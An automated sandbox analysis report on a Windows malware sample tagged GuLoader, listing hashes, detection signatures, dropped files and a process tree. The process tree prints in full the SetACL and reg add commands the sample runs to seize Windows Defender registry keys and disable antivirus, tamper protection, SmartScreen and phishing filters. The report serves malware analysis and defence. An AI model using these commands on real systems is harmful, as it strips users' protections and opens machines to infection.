Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
P196hUN2fw.exe

Overview

General Information

Sample Name:P196hUN2fw.exe
Original Sample Name:e5daf6477340857b1d2d04411d7c0377.exe
Analysis ID:889003
MD5:e5daf6477340857b1d2d04411d7c0377
SHA1:064d70629cce898ac26eca755c1f24573d1e6362
SHA256:99aa0a112de10ceb2072e32e189befed18db5ce294787bf9b2dbe0ef643ba62c
Tags:exeGuLoader
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Submitted sample is a known malware sample
Uses cmd line tools excessively to alter registry or file data
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Too many similar processes found
Found dropped PE file which has not been started or loaded
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • P196hUN2fw.exe (PID: 7096 cmdline: C:\Users\user\Desktop\P196hUN2fw.exe MD5: E5DAF6477340857B1D2D04411D7C0377)
    • cmd.exe (PID: 7120 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nst356E.tmp\do32.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • SetACL32.exe (PID: 1572 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 4760 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 4476 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 3032 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 4180 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 920 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 2328 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • SetACL32.exe (PID: 6180 cmdline: SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 93B828ED97CB2C701364DF520DDD5331)
      • reg.exe (PID: 6164 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4956 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4496 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2492 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4576 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4968 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6392 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6364 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6356 cmdline: reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6336 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • Conhost.exe (PID: 6364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 6472 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6448 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6444 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6424 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6552 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6540 cmdline: reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6652 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6800 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6832 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4756 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4720 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4732 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4704 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2152 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6584 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6612 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6572 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6908 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6660 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6520 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: P196hUN2fw.exeReversingLabs: Detection: 54%
Source: P196hUN2fw.exeVirustotal: Detection: 46%Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun.exeReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun.exeVirustotal: Detection: 29%Perma Link
Source: P196hUN2fw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: P196hUN2fw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdbI source: SetACL32.exe, 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.398309778.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.399019913.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.400165246.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.400414047.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.401125929.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.401995733.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.401457083.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.402317383.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.402912531.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.403233090.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.404159972.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.405417159.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.404807673.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.405628679.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.406213773.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb source: SetACL32.exe, 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.398309778.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.399019913.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.400165246.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.400414047.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.401125929.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.401995733.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.401457083.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.402317383.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.402912531.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.403233090.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.404159972.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.405417159.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.404807673.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.405628679.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.406213773.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe.0.dr
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_00406268 FindFirstFileA,FindClose,0_2_00406268
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040572D
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012C4900 FindFirstFileW,GetLastError,3_2_012C4900
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: P196hUN2fw.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: P196hUN2fw.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: SetACL32.exe, 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.398309778.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.399019913.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.400165246.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.400414047.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.401125929.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.401995733.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.401457083.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.402317383.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.402912531.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.403233090.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.404159972.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.405417159.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.404807673.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.405628679.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.406213773.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com
Source: SetACL32.exe, 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.398309778.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.399019913.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.400165246.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.400414047.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.401125929.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.401995733.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.401457083.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.402317383.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.402912531.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.403233090.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.404159972.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.405417159.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.404807673.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.405628679.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.406213773.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com.
Source: SetACL32.exe, 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.398309778.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.399019913.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.400165246.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.400414047.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.401125929.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.401995733.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.401457083.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.402317383.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.402912531.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.403233090.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.404159972.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.405417159.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.404807673.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.405628679.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.406213773.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: PowerRun64.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_004051CA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004051CA
Source: reg.exeProcess created: 66

System Summary

barindex
Submitted sample is a known malware sample
Source: C:\Users\user\Desktop\P196hUN2fw.exeDropped file: MD5: b38561661a7164e3bbb04edc3718fe89 Family: Chafer Alias: APT39, Chafer Description: Chafers (also known as APT39) focus on the telecommunications and travel industries suggests intent to perform monitoring, tracking, or surveillance operations against specific individuals. While its targeting scope is global, the activities are concentrated in the Middle East. Government entities targeting suggests a potential secondary intent to collect geopolitical data that may benefit nation-state decision making. References: https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html https://mp.weixin.qq.com/s/c2z4laJ0oq5y0BAEFM3Y9wData Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: P196hUN2fw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031F1
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_004067420_2_00406742
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_00404A090_2_00404A09
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_00406F190_2_00406F19
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012D23933_2_012D2393
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012E39333_2_012E3933
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012DC5083_2_012DC508
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_0129BDD03_2_0129BDD0
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012C4C303_2_012C4C30
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012E38133_2_012E3813
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012BFC503_2_012BFC50
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012E1CAA3_2_012E1CAA
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_0129CCB03_2_0129CCB0
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012DDB793_2_012DDB79
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012C8BB03_2_012C8BB0
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012A3F903_2_012A3F90
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_0129DA103_2_0129DA10
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_01299A403_2_01299A40
